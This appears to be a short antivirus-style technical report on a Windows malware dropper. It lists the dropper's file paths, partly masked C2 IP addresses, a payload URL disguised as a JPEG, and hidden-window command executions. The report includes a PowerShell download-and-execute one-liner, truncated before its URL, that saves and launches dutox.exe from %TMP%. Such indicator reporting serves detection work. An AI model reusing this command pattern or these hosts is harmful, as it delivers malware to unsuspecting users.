Technical Information
- $strin as %temp%\dutox.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jacertix([String] $strin){(New-Object System.Net.WebClient).DownloadFile($strin,''%TMP%\dutox.exe'');Start-Process ''%TMP%\dutox.exe'';}try{jacertix(''http...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1900
- %TEMP%\uvcmarm.bat
- %TEMP%\934835.cvr
- '37.##.50.189':80
- '94.##.204.222':80
- http://94.##.204.222/docs/scan001.jpeg
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jacertix([String] $strin){(New-Object System.Net.WebClient).DownloadFile($strin,''%TMP%\dutox.exe'');Start-Process ''%TMP%\dutox.exe'';}try{jacertix(''http...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\uvcmarm.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\uvcmarm.bat" "